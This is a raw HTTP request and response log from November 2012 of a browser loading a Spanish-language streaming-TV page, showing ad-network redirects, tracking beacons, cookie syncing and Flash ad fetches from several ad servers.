User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Fri, 09 Nov 2012 12:39:32 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0081.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=1857385it/*http%3A//ad.yieldmanager.com/imp?Z=800x440&amp;position=btf&amp;s=3488682&amp;suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&amp;t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&amp;_salt=2845216435&amp;B=10&amp;u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;r=1
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:32 GMT
Expires: Fri, 09 Nov 2012 12:39:32 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /st?ad_type=iframe&ad_size=468x60&section=2833602 HTTP/1.1

Host: adserving.cpxinteractive.com
GET /st?ad_type=iframe&amp;ad_size=468x60&amp;section=2833602 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/468x60-2.html?526770425
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Fri, 09 Nov 2012 12:39:32 GMT
Content-Length: 587
GET /imp?Z=0x0&y=28&S=INSERT%5fSECTION%5fCODE%5fHERE&i=991315&_salt=4141907090&B=10&r=0 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=0x0&amp;y=28&amp;S=INSERT%5fSECTION%5fCODE%5fHERE&amp;i=991315&amp;_salt=4141907090&amp;B=10&amp;r=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Fri, 09 Nov 2012 12:39:32 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0451.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=13hj0s07q/*http%3A//ad.yieldmanager.com/imp?Z=0x0&amp;y=28&amp;S=INSERT%5fSECTION%5fCODE%5fHERE&amp;i=991315&amp;_salt=4141907090&amp;B=10&amp;r=0
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:32 GMT
Expires: Fri, 09 Nov 2012 12:39:32 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /ptj?member=541&size=468x60&inv_code=2833602&referrer=http%3A%2F%2Fwww.castamp.com%2F468x60-2.html%3F526770425&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D468x60%26section%3D2833602 HTTP/1.1

Host: ib.adnxs.com
GET /ptj?member=541&amp;size=468x60&amp;inv_code=2833602&amp;referrer=http%3A%2F%2Fwww.castamp.com%2F468x60-2.html%3F526770425&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D468x60%26section%3D2833602 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2833602
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Thu, 07-Feb-2013 12:39:32 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sat, 10-Nov-2012 12:39:32 GMT; domain=.adnxs.com; HttpOnly icu=ChII7esIEAoYASABKAEwhPPzhAUQhPPzhAUYAA..; path=/; expires=Thu, 07-Feb-2013 12:39:32 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSnZpE[s]kb10I3Vwx4PkkOY1ydik999/'^:MwB; path=/; expires=Thu, 07-Feb-2013 12:39:32 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 09 Nov 2012 12:39:32 GMT
Content-Length: 6987
GET /v2/cexposer/SIG=1857385it/*http%3A//ad.yieldmanager.com/imp?Z=800x440&position=btf&s=3488682&suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&_salt=2845216435&B=10&u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&r=1 HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=1857385it/*http%3A//ad.yieldmanager.com/imp?Z=800x440&amp;position=btf&amp;s=3488682&amp;suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&amp;t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&amp;_salt=2845216435&amp;B=10&amp;u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;r=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
Cookie: B=clhp0pd89puc3&amp;b=3&amp;s=vm
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Fri, 09 Nov 2012 12:39:32 GMT
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?Z=800x440&amp;position=btf&amp;s=3488682&amp;suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&amp;t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&amp;_salt=2845216435&amp;B=10&amp;u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;r=1&amp;SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&amp;o=3&amp;f=iz
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /beacon.js HTTP/1.1

Host: b.scorecardresearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2833602
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Expires: Fri, 23 Nov 2012 12:39:32 GMT
Date: Fri, 09 Nov 2012 12:39:32 GMT
Content-Length: 1140
Connection: keep-alive
Cache-Control: private, no-transform, max-age=1209600
GET /v2/cexposer/SIG=13hj0s07q/*http%3A//ad.yieldmanager.com/imp?Z=0x0&y=28&S=INSERT%5fSECTION%5fCODE%5fHERE&i=991315&_salt=4141907090&B=10&r=0 HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=13hj0s07q/*http%3A//ad.yieldmanager.com/imp?Z=0x0&amp;y=28&amp;S=INSERT%5fSECTION%5fCODE%5fHERE&amp;i=991315&amp;_salt=4141907090&amp;B=10&amp;r=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
Cookie: B=clhp0pd89puc3&amp;b=3&amp;s=vm
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Fri, 09 Nov 2012 12:39:32 GMT
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?Z=0x0&amp;y=28&amp;S=INSERT%5fSECTION%5fCODE%5fHERE&amp;i=991315&amp;_salt=4141907090&amp;B=10&amp;r=0&amp;SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&amp;o=3&amp;f=iz
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /imp?Z=300x250&S=3718825&i=991315&T=3&_salt=2189805042&B=10&u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&r=0&SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&o=3&f=iz HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=300x250&amp;S=3718825&amp;i=991315&amp;T=3&amp;_salt=2189805042&amp;B=10&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r=0&amp;SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&amp;o=3&amp;f=iz HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&amp;ad_size=300x250&amp;site=991315&amp;section_code=3718825
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Fri, 09 Nov 2012 12:39:32 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0604.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: BX=clhp0pd89puc3&amp;b=3&amp;s=vm&amp;t=313; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT uid=uid=82ec1c42-2a6a-11e2-a0ca-17980e9e8e4b&amp;_hmacv=1&amp;_salt=2623119133&amp;_keyid=k1&amp;_hmac=96cb1dfefb4c420378f8f9b686db4dd17bb15fe3; path=/; expires=Sun, 09-Dec-2012 12:39:32 GMT RMBX=clhp0pd89puc3&amp;b=3&amp;s=vm&amp;t=313; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:32 GMT
Expires: Fri, 09 Nov 2012 12:39:32 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /b?c1=8&c2=6035951&c3=144877&ns__t=1352464772918&ns_c=UTF-8&c8=&c7=http%3A%2F%2Fadserving.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D468x60%26section%3D2833602&c9=http%3A%2F%2Fwww.castamp.com%2F468x60-2.html%3F526770425 HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=6035951&amp;c3=144877&amp;ns__t=1352464772918&amp;ns_c=UTF-8&amp;c8=&amp;c7=http%3A%2F%2Fadserving.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D468x60%26section%3D2833602&amp;c9=http%3A%2F%2Fwww.castamp.com%2F468x60-2.html%3F526770425 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2833602
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://b.scorecardresearch.com/b2?c1=8&amp;c2=6035951&amp;c3=144877&amp;ns__t=1352464772918&amp;ns_c=UTF-8&amp;c8=&amp;c7=http%3A%2F%2Fadserving.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D468x60%26section%3D2833602&amp;c9=http%3A%2F%2Fwww.castamp.com%2F468x60-2.html%3F526770425
Date: Fri, 09 Nov 2012 12:39:32 GMT
Connection: keep-alive
Set-Cookie: UID=427e3f0-195.159.219.8-1352464772; expires=Thu, 30-Oct-2014 12:39:32 GMT; path=/; domain=.scorecardresearch.com UIDR=1352464772; expires=Thu, 30-Oct-2014 12:39:32 GMT; path=/; domain=.scorecardresearch.com
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /p/68/34/1f/d2/68341fd2b8532ca39fcfde9bdcc59c49.swf?clickTag=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAGewc7hBQCBloArzhH1cTlGE-ZxQAAAAAI12DgAdAgAAHQIAAAIAAADJfysAWaMCAAAAAQBVU0QAVVNEANQBPACAOQAAHlMAAgQCAQUAAIQAWxOFwwAAAAA.%2Fcnd%3D%2521PwbYNwjqwh8Qyf-tARjZxgogBA..%2Freferrer%3Dhttp%253A%252F%252Fwww.castamp.com%252F468x60-2.html%253F526770425%2Fclickenc%3Dhttp%253A%252F%252Fwww.qubble.com%252Fonline_ads%252Findex.php%253Fdata%253DNO_IPHONE4S.swf%2526affid%253DCPX2%2526type%253DNM%2526sem%253DN%2526stype%253DSCENARIO%2526vas%253D24183%2526apn%253Dams1CKCVzKfYj5enURACGOfgzsObiJCQZSIOODAuMjAzLjE2OC4yNTQoAQ.. HTTP/1.1

Host: cdn.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2833602
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSnZpE[s]kb10I3Vwx4PkkOY1ydik999/'^:MwB; sess=1; icu=ChII7esIEAoYASABKAEwhPPzhAUQhPPzhAUYAA..
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: Apache
Etag: &quot;68341fd2b8532ca39fcfde9bdcc59c49:1344370578&quot;
Last-Modified: Tue, 07 Aug 2012 20:16:16 GMT
Accept-Ranges: bytes
Content-Length: 27882
Date: Fri, 09 Nov 2012 12:39:32 GMT
Connection: keep-alive
GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1

Host: view.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2833602
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: no-store
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Date: Fri, 09 Nov 2012 12:39:32 GMT
Connection: close
Content-Length: 381
GET /b2?c1=8&c2=6035951&c3=144877&ns__t=1352464772918&ns_c=UTF-8&c8=&c7=http%3A%2F%2Fadserving.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D468x60%26section%3D2833602&c9=http%3A%2F%2Fwww.castamp.com%2F468x60-2.html%3F526770425 HTTP/1.1

Host: b.scorecardresearch.com
GET /b2?c1=8&amp;c2=6035951&amp;c3=144877&amp;ns__t=1352464772918&amp;ns_c=UTF-8&amp;c8=&amp;c7=http%3A%2F%2Fadserving.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D468x60%26section%3D2833602&amp;c9=http%3A%2F%2Fwww.castamp.com%2F468x60-2.html%3F526770425 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2833602
Cookie: UID=427e3f0-195.159.219.8-1352464772; UIDR=1352464772
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 09 Nov 2012 12:39:32 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

Host: ib.adnxs.com
GET /pxj?bidder=55&amp;action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSnZpE[s]kb10I3Vwx4PkkOY1ydik999/'^:MwB; sess=1; icu=ChII7esIEAoYASABKAEwhPPzhAUQhPPzhAUYAA..
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Thu, 07-Feb-2013 12:39:33 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sat, 10-Nov-2012 12:39:33 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSnZpE[s]kb10I3Vwx4PkkOY1ydik999/'^:MwB; path=/; expires=Thu, 07-Feb-2013 12:39:33 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Fri, 09 Nov 2012 12:39:33 GMT
GET /images/pixel.gif HTTP/1.1

Host: spe.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 42
Allow: GET
Expires: Sun, 11 Nov 2012 15:55:27 GMT
Date: Fri, 09 Nov 2012 12:39:33 GMT
Connection: keep-alive
GET /atoms/a7/c4/19/cf/a7c419cf8765831e7f08878508323ecc.gif HTTP/1.1

Host: content.yieldmanager.edgesuite.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&amp;ad_size=300x250&amp;site=991315&amp;section_code=3718825
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
Etag: &quot;a7c419cf8765831e7f08878508323ecc:1302805721&quot;
Last-Modified: Thu, 14 Apr 2011 18:28:38 GMT
Accept-Ranges: bytes
Content-Length: 10095
Cache-Control: max-age=31536000
Date: Fri, 09 Nov 2012 12:39:33 GMT
Connection: keep-alive
GET /imp?Z=800x440&position=btf&s=3488682&suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&_salt=2845216435&B=10&u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&r=1&SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&o=3&f=iz HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=800x440&amp;position=btf&amp;s=3488682&amp;suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&amp;t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&amp;_salt=2845216435&amp;B=10&amp;u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;r=1&amp;SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&amp;o=3&amp;f=iz HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Fri, 09 Nov 2012 12:39:33 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0359.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: BX=clhp0pd89puc3&amp;b=3&amp;s=vm&amp;t=313; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT uid=uid=832645e8-2a6a-11e2-9031-2f503275c74f&amp;_hmacv=1&amp;_salt=2024960830&amp;_keyid=k1&amp;_hmac=fe14636c9386340d7d656ee9384463df6f09ff21; path=/; expires=Sun, 09-Dec-2012 12:39:32 GMT RMBX=clhp0pd89puc3&amp;b=3&amp;s=vm&amp;t=313; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:33 GMT
Expires: Fri, 09 Nov 2012 12:39:33 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 1
Transfer-Encoding: chunked
Connection: keep-alive
GET /atoms/a2/a0/b7/56/a2a0b756a8b96868e5287a36bc7bc28c.swf?clickTAG=http%3A%2F%2Fad%2Esmowtion%2Ecom%2Fclk%3F3%2CeJydjM1uwjAQhJ%2DGW0D%2DwcKV1cOCAZWS0EjmQG6OMXHahIDqOlKevgEieu9otfpmd3YxFZzkp5wZTRFj9Ii4wFRbRqw%2DWRwhIQSfzhjDhE0juOm9mSXpIifWwMObwy59IBR3P7%2EzB7%2E1tbwiq4b14sUlAxV638L%2EJS%2EgDgO%2EAfSvCsnheOU%2ETDXzv1jRxZ8G7dZ7tFUbl9RLH6tVFZeIZXJTbpWrs3pJk87gTH51Wfq8fI0i5%2E1lRGFEVn21bTvx4dwEW%2Dke%2Dom3lQ3ltx7b8ziUoZk4X1e%2EF4BiMg%3D%3D%2C HTTP/1.1

Host: content.yieldmanager.edgesuite.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: Apache
Etag: &quot;a2a0b756a8b96868e5287a36bc7bc28c:1319964698&quot;
Last-Modified: Sun, 30 Oct 2011 08:51:37 GMT
Accept-Ranges: bytes
Content-Length: 4207
Cache-Control: max-age=31536000
Date: Fri, 09 Nov 2012 12:39:33 GMT
Connection: keep-alive
